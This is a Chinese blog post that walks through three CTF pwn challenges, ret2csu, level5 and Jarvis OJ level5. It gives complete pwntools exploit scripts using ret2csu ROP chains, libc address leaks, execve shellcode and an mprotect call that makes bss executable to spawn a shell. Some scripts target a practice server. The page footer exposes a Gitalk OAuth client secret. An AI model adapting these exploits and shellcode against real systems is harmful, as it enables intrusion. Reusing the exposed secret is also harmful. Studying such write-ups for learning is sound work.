<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    libc_csu |
    
    The lair of C0yo7e</title>
  
    <link rel="shortcut icon" href="/images/time.png">
  
  <link rel="stylesheet" href="/css/style.css">
  
    <link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">
  
  <script src="/js/pace.min.js"></script>
</head>
</html>
<body>
<main class="content">
  <section class="outer">
  

<article id="post-libc-csu" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      libc_csu
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2019/07/08/libc-csu/" class="article-date">
  <time datetime="2019-07-08T15:15:17.000Z" itemprop="datePublished">2019-07-08</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h2 id="libc-csu"><a href="#libc-csu" class="headerlink" title="_libc_csu"></a><em>_libc_csu</em></h2><p>1、Ret2csu</p>
<p>这是一个64位的题，开了NX，照常，进ida里瞄瞄它的大体结构是怎样的。<br>Emmm真是一个异常简洁的main函数</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%871.png" alt></p>
<p>我们发现它有个pwnme函数哦，那就点进去看一下</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%872.png" alt></p>
<p>它里面说了ret2win 的第三个参数（rdx）必须为“0xdeadcafebabebeef”，异或出来是“/bin/cat”，先记住它。然后它还有一堆的赋值为0的语句，手欠点开来看，发现它把got表全置0了，那么我们就完全不用考虑got表。</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%873.png" alt></p>
<a id="more"></a>

<p>然后我们会看到还有一个ret2win函数</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%874.png" alt></p>
<p>看到system就知道我们的getshell的关键步骤就在这里了，最后就是要把地址指向ret2win这个函数的，所以下一步就是要去找gadget。</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%875.png" alt></p>
<p>我们知道ret2win的第三个参数是与rdx有关的，但是我们找不到关于rdx的gadget，所以只能另辟他径。<br>ret2csu这类题目貌似就是通过__libc_csu_init函数的操作（很多gadget的函数）</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%876.png" alt></p>
<p>由函数体关系得知<br>rbx=0<br>rbp=1（rbp=rbx+1）<br>r12：存调用函数的地址<br>r13：函数的第一个参数<br>r14：函数的第二个参数<br>r15：函数的第三个参数（a3/rdx）</p>
<p>然后还有一个很严重的问题，有一个setvbuf函数，据大佬所说是会把rdx的值赋值为0xfffffff，然后无法调用ret2win，所以导致在call处程序出错，无法再执行下去（但是我是在是调不到setvbuf那个函数的地方，下断点也没找到那个赋值语句）然后只能选用一个程序的初始化用的函数地址，</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%877.png" alt></p>
<p>就这两个函数的地址，用这两个函数写入r12里，躲过setvbuf，然后就可以getshell了。</p>
<p>rdx是由r15传值得到的，而刚好下面的一系列操作包括r15的，所以这些gadget可用，上面的函数有个跳转指令，为了使他不跳转，我们可以直接对rbx和rbp赋值，rbx为0，rbp为1。我们先pop这些寄存器，并且赋值，再进入mov，最后在call的地方调用ret2win，所以r12存的应该是ret2win的地址。<br>理清得差不多了，就开始写exp了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line">sh = process(<span class="string">'./ret2csu'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#bss = 0x0601060</span></span><br><span class="line">start = 0x0400880<span class="comment">#mov rdx, r15;mov  rsi, r14;mov  edi, r13d;call  qword ptr [r12+rbx*8]</span></span><br><span class="line">end = 0x0400896<span class="comment">#add  rsp, 8;pop  rbx;pop  rbp;pop  r12/r13/r14/r15</span></span><br><span class="line">init = 0x0600E10</span><br><span class="line">win = 0x04007B1</span><br><span class="line"></span><br><span class="line">payload = <span class="string">"a"</span>*0x20+p64(0)</span><br><span class="line">payload += p64(end)</span><br><span class="line">payload += p64(0)</span><br><span class="line">payload += p64(0)<span class="comment">#rbx</span></span><br><span class="line">payload += p64(1)<span class="comment">#rbp</span></span><br><span class="line">payload += p64(init)<span class="comment">#r12</span></span><br><span class="line">payload += p64(0)<span class="comment">#r13</span></span><br><span class="line">payload += p64(0)<span class="comment">#r14</span></span><br><span class="line">payload += p64(0xdeadcafebabebeef)<span class="comment">#r15(rdx)</span></span><br><span class="line">payload += p64(start)</span><br><span class="line">payload += <span class="string">"a"</span>*56</span><br><span class="line">payload += p64(win)</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>运行之后就拿到flag了</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%878.png" alt></p>
<h2 id="level5"><a href="#level5" class="headerlink" title="level5"></a>level5</h2><p>Ida里打开main函数</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%879.png" alt><br><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8710.png" alt></p>
<p>发现这个程序调用了write和read两个函数。<br>没有system没有“/bin/sh”<br>看到了熟悉的gadget</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8711.png" alt></p>
<p>再看看在write和read里面，参数分别是存入哪些寄存器</p>
<p>Write<br><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8712.png" alt></p>
<p>Read<br><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8713.png" alt></p>
<p>易知第三个参数存入edx（rdx），第二个是esi（rsi），第三个是edi（rdi）<br>在上面的万用gadget里我们知道rdx的值来自于r13，rsi来自于r14，edi来自于r15d</p>
<p>我们要做的是<br>（1）、先调用write函数把read/write函数的真实地址泄露出来（运行程序的时候这两个函数被调用了）找到system或者execve的真实地址<br>（2）、用read函数，把system（“/bin/sh”）写进bss段里(system在bss里，即bss_addr，”/bin/sh”在bss的下一个地址,即bss_addr+8<br>（3）、调用system函数达成getshell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./level5"</span>)</span><br><span class="line">elf = ELF(<span class="string">'./level5'</span>)</span><br><span class="line"></span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line"><span class="comment">#bss_base = elf.bss()</span></span><br><span class="line">bss_addr = 0x0601040</span><br><span class="line"></span><br><span class="line">start_addr = 0x0400600  <span class="comment">#add rsp, 8 pop rbx,rbp,r12,r13,r14,r15</span></span><br><span class="line">end_addr = 0x040061A  <span class="comment">#mov rdx,13 rsi,r14 eid,r15 call</span></span><br><span class="line">_start = elf.symbols[<span class="string">'_start'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def csu(rbx,rbp,r12,r13,r14,r15,_start):</span><br><span class="line">	payload = <span class="string">"a"</span>*0x80 +p64(0)</span><br><span class="line">	payload += p64(end_addr)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)</span><br><span class="line">	payload += p64(start_addr)+<span class="string">"a"</span>*0x38</span><br><span class="line">	payload += p64(_start)</span><br><span class="line">	p.send(payload)</span><br><span class="line">	sleep(1)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Hello, World\n'</span>)</span><br><span class="line"></span><br><span class="line">csu(0,1,write_got,8,write_got,1,_start)</span><br><span class="line"></span><br><span class="line">write_addr = u64(p.recv(8))</span><br><span class="line">libc = LibcSearcher(<span class="string">'write'</span>,write_addr)</span><br><span class="line">offest = write_addr-libc.dump(<span class="string">'write'</span>)</span><br><span class="line">system_addr = libc.dump(<span class="string">'system'</span>)+offest</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Hello, World\n"</span>)</span><br><span class="line"></span><br><span class="line">csu(0,1,read_got,16,bss_addr,0,_start)</span><br><span class="line"></span><br><span class="line">p.send(p64(system_addr)+<span class="string">"/bin/sh\x00"</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Hello, World\n"</span>)</span><br><span class="line"></span><br><span class="line">csu(0,1,bss_addr,0,0,bss_addr+8,_start)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>运行结果<br><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8714.png" alt></p>
<h2 id="OJ-level5"><a href="#OJ-level5" class="headerlink" title="OJ level5"></a>OJ level5</h2><p>题目说假设system和execve被禁用，用mmap和mprotect实现getshell。<br>所以我们需要自己将shellcode写进bss段里。</p>
<p>科普一下mmap和mprotect</p>
<p>我们通过函数mmap来告诉操作系统把哪个文件映射哪块内存去，并且设置我们可能对这块内存的不能操作，就是对文件一样。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include&lt;sys/mman.h&gt;</span></span><br><span class="line">void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)</span><br><span class="line"></span><br><span class="line">返回值：成功返回被映射的内存地址，失败返回MAP_FIALED</span><br></pre></td></tr></table></figure>

<p>参数 addr<br>这个只有在极少数情况下才不为0，这个参数告诉内核使用addr指定的值来映射指定文件。当指定为0的时候，告诉内核返回什么地址内其自身决定。除非非常了解系统进程模式，或者对当前环境非常了解，否则的话手工指定这个值总是不可取。<br>参数 len<br>指定被映射的内存区域的长度。<br>参数 port<br>这个参数对应open函数的权限位，我们可以指定为：PROT_READ，映射区可读；PROT_WRITE，映射区可写；PROT_EXEC，映射区可执行；PROT_NONE，映射区不可访问。由于只能映射已经打开的文件，所以这个权限位不能超出open函数指定的权限，比如说在open的时候指定为只读，那就不能在此时指定PORT_WRITE。<br>参数 flag<br>这个参数指定了映射区的其它一些属性，权限的属性已经在port中指定。这里可能存在的典型值有：MAP_FIXED，针对addr属性，如果指定这个位，那么要求系统必需在指定的地址映射，这往往是不可取的；MAP_SHARED，此标志说明指定映射区是共享的，意思就是说对内存的操作与对文件的操作是相对应的，它不能与MAP_PRIVATE标志一直使用，因为它们表达的意图是相反的；MAP_PRIVATE，该标志说明映射区是私用的，此时被映射的内存只能被当前里程使用，当进程操作的内存将会产生原文件的一个副本。</p>
<p>mprotect 函数可以更改一个已经存在的映射区的访问权限。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include&lt;sys/mman.h&gt;</span></span><br><span class="line">int mprotect(void* addr, size_t len, int port)</span><br><span class="line"></span><br><span class="line">返回值：成功返回0，失败返回-1</span><br></pre></td></tr></table></figure>

<p>参数 addr<br>这个参数是mmap返回的数值，此时它就是mprotect作用的范围。<br>参数 len<br>指定映射区的长度，它需要与mmap中指定相同。<br>参数 port<br>在上面我们已经介绍了port的可能取值，mprotect功能就是把这个port指定的属性施加于相应的映射区上。</p>
<p>好，我们来看题</p>
<p>开了NX<br>既然题目有提示一个更改权限的函数，那我们就去看一下bss段的权限，应该是禁止执行了的</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8715.png" alt></p>
<p>readelf -S先找到bss的地址</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8716.png" alt></p>
<p>vmmap查看权限，bss段的地址为0x600a88 ，在0x600000-0x601000之间，不可执行</p>
<p>思路：<br>（1）先通过write函数leak出write（也可以是其他）的真实地址<br>（2）找到mprotect的真实地址<br>（3）将shellcode写入bss段<br>（4）调用mprotect将bss段权限更改<br>（5）调用bss，getshell</p>
<p>第一段的代码：（leak write_addr，found mprotect_addr）</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8717.png" alt></p>
<p>第二段（shellcode写入bss）</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8718.png" alt></p>
<p>第三段（找两个空的got地址，将mprotect和bss写入方便调用）</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8719.png" alt></p>
<p>最后就直接通过csu调用bss段就可以getshell了，（很奇怪的是本地get不到，远程可以）</p>
<p><img src="/2019/07/08/libc-csu/%E5%9B%BE%E7%89%8720.png" alt></p>
<h1 id="两种方法的exp"><a href="#两种方法的exp" class="headerlink" title="两种方法的exp"></a>两种方法的exp</h1><p>第一种（写个函数，直接调用）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line">sh=remote(<span class="string">'pwn2.jarvisoj.com'</span>,9884)</span><br><span class="line"><span class="comment">#sh = process('./level3_x64')</span></span><br><span class="line">elf =ELF(<span class="string">'./level3_x64'</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc-2.19.so'</span>)</span><br><span class="line"></span><br><span class="line">vul = elf.symbols[<span class="string">'vulnerable_function'</span>]</span><br><span class="line"><span class="comment">#read_plt = elf.symbols['read']</span></span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line">read_libc = libc.symbols[<span class="string">'read'</span>]</span><br><span class="line">mprotect_libc = libc.symbols[<span class="string">'mprotect'</span>]</span><br><span class="line">write_libc = libc.symbols[<span class="string">"write"</span>]</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line"><span class="comment">#write_plt = elf.plt['write']</span></span><br><span class="line"><span class="comment">#bss = 0x0600A88</span></span><br><span class="line">bss = elf.bss()</span><br><span class="line"></span><br><span class="line"><span class="comment">#gadget</span></span><br><span class="line">pop5_addr = 0x04006A6</span><br><span class="line">mov_call = 0x0400690    </span><br><span class="line"></span><br><span class="line">bss_got = 0x0600A48</span><br><span class="line">mprotect_got = 0x0600A50</span><br><span class="line"></span><br><span class="line">def csu(r12,r13,r14,r15,data=False):</span><br><span class="line">	data_num=<span class="string">''</span></span><br><span class="line">	payload = <span class="string">"a"</span>*0x88</span><br><span class="line">	payload += p64(pop5_addr)+p64(0)+p64(0)+p64(1)+p64(r12)+p64(r13)+p64(r14)+p64(r15)</span><br><span class="line">	payload += p64(mov_call)+<span class="string">"a"</span>*0x38</span><br><span class="line">	payload += p64(vul)</span><br><span class="line">	sh.recvuntil(<span class="string">"Input:\n"</span>)</span><br><span class="line">	sh.send(payload)</span><br><span class="line">	<span class="keyword">if</span> data==True:</span><br><span class="line">		data_num = u64(sh.recv(8))</span><br><span class="line">	<span class="built_in">return</span> data_num</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">read_addr = csu(write_got,8,read_got,1,True)</span><br><span class="line">mprotect_addr = read_addr - read_libc + mprotect_libc</span><br><span class="line"><span class="built_in">print</span> <span class="string">"mprotect_addr:"</span> + hex(mprotect_addr)</span><br><span class="line"></span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line">bss = elf.bss()</span><br><span class="line">shellcode = <span class="string">'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'</span></span><br><span class="line">csu(read_got,len(shellcode),bss,0)</span><br><span class="line">sh.send(shellcode)</span><br><span class="line">mprotect_got = 0x0600A50</span><br><span class="line">csu(read_got,8,mprotect_got,0)</span><br><span class="line">sh.send(p64(mprotect_addr))</span><br><span class="line">csu(mprotect_got,7,0x1000,0x600000)</span><br><span class="line">bss_got = 0x0600A48</span><br><span class="line">csu(read_got,8,bss_got,0)</span><br><span class="line">sh.send(p64(bss))</span><br><span class="line">csu(bss_got,0,0,0)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>第二种（用pop rdi，rsi，rdx来存参）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line">sh =remote(<span class="string">'pwn2.jarvisoj.com'</span>,9884)</span><br><span class="line"><span class="comment">#sh = process('./level3_x64')</span></span><br><span class="line">elf = ELF(<span class="string">"./level3_x64"</span>)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.19.so"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#write_plt = 0x04004B0</span></span><br><span class="line">write_plt = elf.plt[<span class="string">"write"</span>]</span><br><span class="line">write_got = elf.got[<span class="string">"write"</span>]</span><br><span class="line">vul = elf.symbols[<span class="string">"vulnerable_function"</span>]</span><br><span class="line"><span class="comment">#bss = 0x0600A88</span></span><br><span class="line">bss_base = elf.bss()</span><br><span class="line"></span><br><span class="line">read_plt = elf.symbols[<span class="string">"read"</span>]</span><br><span class="line">read_got = elf.got[<span class="string">"read"</span>]</span><br><span class="line">write_libc = libc.symbols[<span class="string">"write"</span>]</span><br><span class="line">mprotect_libc = libc.symbols[<span class="string">"mprotect"</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#gadget</span></span><br><span class="line">pop_rdi = 0x00000000004006b3 <span class="comment">#the first parameter</span></span><br><span class="line">pop_rsi_rdx = 0x00000000004006b1 <span class="comment">#the second and third </span></span><br><span class="line"></span><br><span class="line">pop5_addr = 0x00000000004006A6</span><br><span class="line">mov_call = 0x0000000000400690     <span class="comment">#distence 0x1a</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">"a"</span>*0x80 + p64(0)</span><br><span class="line">payload1 += p64(pop_rdi)+p64(1)+p64(pop_rsi_rdx)+p64(write_got)+p64(0)+p64(write_plt)+p64(vul)</span><br><span class="line">sh.recv()</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(payload1)</span><br><span class="line">data = sh.recv(8)</span><br><span class="line">write_addr = u64(data)</span><br><span class="line"></span><br><span class="line">libc_dis = write_addr - libc.symbols[<span class="string">"write"</span>]</span><br><span class="line">mprotect_addr = libc_dis + libc.symbols[<span class="string">"mprotect"</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">read_plt = elf.symbols[<span class="string">"read"</span>]</span><br><span class="line">bss_base = elf.bss()</span><br><span class="line">pop_rdi = 0x00000000004006b3 <span class="comment">#the first parameter</span></span><br><span class="line">pop_rsi_rdx = 0x00000000004006b1 <span class="comment">#the second and third </span></span><br><span class="line"></span><br><span class="line"><span class="comment">#shellcode = asm(shellcraft.sh())</span></span><br><span class="line">shellcode = <span class="string">'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'</span></span><br><span class="line">payload2 = <span class="string">"a"</span>*0x80 + p64(0)</span><br><span class="line">payload2 += p64(pop_rdi)+p64(0)+p64(pop_rsi_rdx)+p64(bss_base)+p64(0)+p64(read_plt)+p64(vul)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(payload2)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(shellcode)</span><br><span class="line"></span><br><span class="line">bss_got = 0x0000000000600A48</span><br><span class="line">payload4 = <span class="string">"a"</span>*0x80 + p64(0)</span><br><span class="line">payload4 += p64(pop_rdi)+p64(0)+p64(pop_rsi_rdx)+p64(bss_got)+p64(0)+p64(read_plt)+p64(vul)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(payload4)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(p64(bss_base)) </span><br><span class="line"></span><br><span class="line">mprotect_got = 0x0000000000600A50</span><br><span class="line">payload3 = <span class="string">"a"</span>*0x80 +p64(0)</span><br><span class="line">payload3 += p64(pop_rdi)+p64(0)+p64(pop_rsi_rdx)+p64(mprotect_got)+p64(0)+p64(read_plt)+p64(vul)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(payload3)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(p64(mprotect_addr))</span><br><span class="line"></span><br><span class="line">pop_rdi = 0x00000000004006b3 <span class="comment">#the first parameter</span></span><br><span class="line">pop_rsi_rdx = 0x00000000004006b1 <span class="comment">#the second and third </span></span><br><span class="line"></span><br><span class="line">payload5 = <span class="string">'a'</span>*0x80+p64(0)</span><br><span class="line">payload5 += p64(pop5_addr) + p64(0) + p64(0) + p64(1) +p64(mprotect_got) + p64(7) +p64(0x1000)+p64(0x600000)</span><br><span class="line">payload5 +=p64(mov_call) </span><br><span class="line">payload5 += <span class="string">'a'</span>*8 + p64(0) + p64(1) + p64(bss_got) + p64(0) + p64(0) + p64(0)</span><br><span class="line">payload5 += p64(mov_call)</span><br><span class="line">sleep(0.2)</span><br><span class="line">sh.send(payload5)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br><span class="line"></span><br><span class="line">`</span><br></pre></td></tr></table></figure>

<h1 id="权限为7，可读可写可执行，长度为0x1000，改0x600000-0x601000段的执行权限"><a href="#权限为7，可读可写可执行，长度为0x1000，改0x600000-0x601000段的执行权限" class="headerlink" title="权限为7，可读可写可执行，长度为0x1000，改0x600000-0x601000段的执行权限"></a>权限为7，可读可写可执行，长度为0x1000，改0x600000-0x601000段的执行权限</h1><p>找了一下午的bug，代码改得有点乱（终于cat到flag也是好心酸的）。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://c0yo7e.github.io/2019/07/08/libc-csu/" data-id="ckdmyucau000ifcswrg62ow7d"
         class="article-share-link">Share</a>
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn知识点/">pwn知识点</a></li></ul>

    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2019/08/16/ssp/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            ssp操作
          
        </div>
      </a>
    
    
      <a href="/2019/07/08/ROP Emporium/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">ROP Emporium</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '57453e2505e1523b1d78',
      clientSecret: 'c9d2109f4649be7dca5ef5622d85e38608a7cd1e',
      repo: 'content',
      owner: 'C0yo7e',
      admin: ['C0yo7e'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 The lair of C0yo7e</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/time.png" alt="The lair of C0yo7e"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="搜索">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
